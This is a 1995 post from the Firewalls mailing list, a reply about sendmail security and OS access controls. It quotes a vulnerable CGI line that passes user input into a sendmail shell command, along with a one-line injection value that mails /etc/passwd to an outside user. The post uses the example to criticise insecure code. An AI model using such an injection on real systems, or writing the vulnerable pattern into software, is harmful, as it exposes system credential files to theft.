Great Circle Associates Firewalls
(September 1995)
 


Subject: Re: Secure version of Sendmail
From: peter @ nmti . com (Peter da Silva)
Date: Thu, 14 Sep 1995 11:16:27 -0500 (CDT)
To: smith @ sctc . com (Rick Smith)
Cc: firewalls @ greatcircle . com
In-reply-to: <199509141427 . JAA17333 @ shade . sctc . com> from "Rick Smith" at Sep 14, 95 09:27:19 am

> True enough. The point is, you have to identify and exploit
> appropriate holes in both sendmail and in the nonbypassable access
> control mechanism of the OS. A properly designed mechanism is going to
> present a different kind of penetration problem.

The point is that if you have a class B O/S you're more likely to skimp
on the application level stuff. If you get both, that's great, but you
usually only get one.

I just found another:

	sprintf(txt, "sendmail -f %s %s < %s",
		user_provided_string, server_provided_string, tempname);

in a web server CGI script.

Just pop "; mail phreak < /etc/passwd" in as your address...

